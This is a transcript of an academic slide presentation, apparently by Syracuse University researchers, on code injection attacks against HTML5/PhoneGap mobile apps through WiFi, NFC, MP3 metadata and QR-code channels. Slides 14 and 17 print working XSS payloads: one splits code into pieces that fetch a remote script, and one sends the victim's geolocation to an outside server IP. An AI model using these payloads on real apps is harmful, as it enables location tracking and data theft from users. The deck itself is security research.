1 / 19

Code Injection Attacks on HTML5-based Mobile Apps

Code Injection Attacks on HTML5-based Mobile Apps. Xing Jin , Tongbo Luo, Derek G. Tsui, Wenliang Du Department of Electrical Engineering & Computer Science Syracuse University . (c). (a). (b). (d). (e). (f). (g). (h). Outline. BackGround

harvey
Download Presentation

Code Injection Attacks on HTML5-based Mobile Apps

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Code Injection Attacks on HTML5-basedMobile Apps Xing Jin, Tongbo Luo, Derek G. Tsui, Wenliang Du Department of Electrical Engineering & Computer Science Syracuse University .

  2. (c) (a) (b) (d) (e) (f) (g) (h)

  3. Outline • BackGround • Overview of HTML5-based Mobile App • Overview of PhoneGap Architecture • Risks in JavaScript • Code Injection Attacks on HTML5-based mobile apps • Overview of the Attack • Channels of the Attack • Examples (WIFI, NFC, MP3) • Length limitation • Real Vulnerable Cases • Future Work

  4. Overview of HTML5-based Mobile App PhoneGap WebView HTML CSS JavaScript addJavascriptInterface() • Device • Accelerometer • Camera • Compass • Contacts • File • Geolocation • Notification • … Advantage: Can be easily ported between different platforms X X

  5. Overview of PhoneGap Architecture

  6. Risks in JavaScript • Data and code can be mixed together. var text="Hello!<script>alert('hello')</script>"; document.write(text); • Once it runs, the data will be displayed, and the JavaScript code will also be executed.

  7. Overview of the Attack

  8. Overview of the Attack 2 3 1

  9. Channels of XDS Attack • ID Channels (WiFi, Bluetooth) • Data Channels Unique to Mobile Devices (NFC, Barcode, SMS) • Metadata Channels (MP3, MP4, Image)

  10. Example 1(WiFi) Non PhoneGap WiFi-Finder PhoneGap WiFi-Finder

  11. Example 2(NFC) Non PhoneGap NFC App PhoneGap NFC App

  12. Example 3(mp3) http://www.cis.syr.edu/~wedu/attack Non PhoneGap Mp3 App PhoneGap Mp3 App

  13. Length Limitation of Channels

  14. Overcome the limitation • Use External JS files: <script src=//mu.gl></script> ( will be filter out by innerHTML) • Split JS code into pieces: <img src onerror=$.getScript('http://mu.gl')> (need to use jQuery) 1 <img src onerror=a="$.getScr"> 2 <img src onerror=b="ipt('ht"> 3 <img src onerror=c="tp://mu."> 4 <img src onerror=d="gl')"> 5 <img src onerror=eval(a+b+c+d)>

  15. Real vulnerable cases • Downloaded 764 PhoneGap apps from Google Play • Find several vulnerable apps satisfy two attack conditions: • read external data from the channels that we have identified • use vulnerable APIs or attributes to display information from the channels

  16. Real Vulnerable Cases Information sent to Sever Non PhoneGap App PhoneGap App

  17. Real vulnerable Cases The code injected in the QR code <img src=x onerror= navigator.geolocation.watchPosition( function(loc){ m='Latitude:'+loc.coords.latitude+ '\n'+'Longitude:'+loc.coords.longitude; alert(m); b=document.createElement('img'); b.src='http://128.230.213.66:5556?c='+m })>

  18. Future Work • Large Scale analysis of HTML5-based mobile apps • Solution to address the attack

  19. Thanks! Q & A

More Related